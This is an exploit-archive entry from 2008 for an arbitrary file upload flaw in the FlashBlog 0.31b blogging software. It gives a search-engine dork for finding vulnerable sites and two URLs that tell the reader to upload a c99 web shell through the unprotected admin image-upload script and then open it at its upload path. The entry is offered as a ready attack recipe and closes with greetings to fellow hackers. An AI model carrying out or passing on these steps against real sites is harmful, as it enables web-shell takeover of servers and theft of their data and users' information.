FlashBlog 0.31b Remote Arbitrary File Upload Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : FlashBlog 0.31b Remote Arbitrary File Upload Vulnerability
# Published : 2008-06-03
# Author : ilker Kandemir
# Previous Title : Joomla Component EasyBook 1.1 (gbid) SQL Injection Exploit
# Next Title : Joomla Component joomradio 1.0 (id) SQL Injection Vulnerability

FlashBlog beta0.31 Remote File Upload Vulnerability

# Author : ilker kandemir a.k.a MEFISTO  

# Dork : inurl:flashblog.html  or  inurl:/flashblog/

# Website : www.dumenci.net, www.coderx.org

http://[site.com]/admin/Editor/imgupload.php ==>>> upload your c99 shell

http://[site.com]/tus_imagenes/c99.php ==>>> your address

Tnx: Dumenci, Damar, Cr@zy_king, Str0ke and all my friendz

# www.Syue.com [2008-06-03]